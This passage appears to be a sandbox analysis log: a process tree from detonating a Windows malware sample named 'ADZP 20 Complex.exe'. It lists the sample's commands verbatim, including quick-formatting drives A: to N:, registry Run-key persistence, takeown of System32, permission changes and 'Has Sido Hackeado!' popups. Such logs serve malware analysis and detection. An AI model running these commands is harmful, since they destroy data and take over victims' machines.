        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:9228
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:8980
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:8996
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:9016
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:9052
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:9072
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1DBE.tmp\1DBF.tmp\1DC0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        
        PID:10556
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:16636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:18240
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:9140
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:9180
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:8096
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:5780
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Program Files"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5832
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib -r -a -s -h "C:\Program Files"
        5⤵
        Views/modifies file attributes
        
        PID:5400
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q A:
        5⤵
        
        PID:9628
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q B:
        5⤵
        
        PID:9864
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q D:
        5⤵
        
        PID:10020
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q E:
        5⤵
        
        PID:9904
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q F:
        5⤵
        
        PID:2112
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q G:
        5⤵
        
        PID:9772
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q H:
        5⤵
        
        PID:3276
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q I:
        5⤵
        
        PID:11076
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q J:
        5⤵
        
        PID:11200
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11340
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:11444
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:11620
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:11700
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:11728
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:12008
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:12052
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:12136
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12200
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:12232
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11472
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:11788
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:11956
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12088
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:11304
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11832
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:12144
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:11548
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12124
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:11460
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:11996
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:11808
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:12364
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12548
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:12696
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:12732
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:12820
    - - C:\Windows\SysWOW64\calc.exe
        
        calc
        5⤵
        
        PID:12872
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:12932
    - - C:\Windows\SysWOW64\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:12976
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q K:
        5⤵
        
        PID:9116
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q L:
        5⤵
        
        PID:15456
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q M:
        5⤵
        
        PID:16820
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q N:
        5⤵
        
        PID:16308
    - - C:\Windows\SysWOW64\format.com
        
        format /y /q ├æ:
        5⤵
        
        PID:17504
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2488
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2372
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2264
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2032
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:768
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1832.tmp\1833.tmp\1834.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
      4⤵
      Drops autorun.inf file
      Drops file in System32 directory
      PID:3024
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        5⤵
        
        PID:1608
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        5⤵
        
        PID:2676
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2780
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:848
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:2448
    - - C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        5⤵
        
        PID:1636
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:1976
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        Views/modifies file attributes
        
        PID:1880
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3344
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3676
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4040
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3388
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3784
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3328
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3152
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3484
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:2832
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4352
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:4360
    - - C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        5⤵
        
        PID:4580
    - - C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        5⤵
        
        PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5036
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8E7A.tmp\8E7B.tmp\8E7C.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:6004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:5300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:188
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:6000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3020
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6904
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:6132
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5248
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6160
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6260
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:17356
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5052
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5068
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5100
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:5116
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8E99.tmp\8E9A.tmp\8E9B.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:6016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:5176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:5272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:4640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:2292
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6928
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:4864
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6132
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6236
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:15560
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        7⤵
        
        PID:18352
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3744
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:4104
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3756
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3856
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:320
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EF7.tmp\8EF8.tmp\8EF9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
        6⤵
        Drops autorun.inf file
        Drops file in System32 directory
        
        PID:6040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:6104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        7⤵
        
        PID:6120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
        7⤵
        
        PID:5536
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5424
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6920
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:5528
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        7⤵
        
        PID:1572
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6204
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:6276
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:17308
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3768
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3892
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:4144
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:4156
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:3692
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4628
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4964
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:4280
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
        5⤵
        
        PID:4856
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
        5⤵
        
        PID:3696
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:9960
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:9984
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:10004
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:10012
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:10032
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:10044
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:10144
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:10164
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:10172
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:948
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:932
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:9380
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5764
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5600
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:9676
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5736
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5592
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:9784
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:9628
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6880
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6888
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:9936
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:9868
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:9980
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:10064
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:10072
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:10088
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:10120
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:10128
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:10200
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:2708
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5900
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:1396
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6776
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:5564
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5528
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6988
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5748
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:10196
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:6680
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:5864
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:4876
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6312
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5940
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:5964
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:9996
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5988
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6852
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:10020
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:9632
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6896
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5292
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5476
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5824
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:9308
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:6372
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:10100
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6424
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6248
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:4480
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6080
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Program Files"
        5⤵
        Views/modifies file attributes
        
        PID:7684
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:11460
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:11280
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:13208
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:13404
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:13920
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:14840
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:16144
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:15440
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:17288
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:15368
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:17180
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:16944
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6488
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:17248
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:17492
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:17584
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:17784
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:17864
    - - C:\Windows\system32\mspaint.exe
        
        mspaint.exe
        5⤵
        
        PID:18048
    - - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
        5⤵
        
        PID:18248
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:17412
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:2908
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:1904
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:2432
- - C:\Windows\system32\mspaint.exe
    mspaint.exe
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2748
- - C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
    "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2692
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\15D2.tmp\15D3.tmp\15D4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
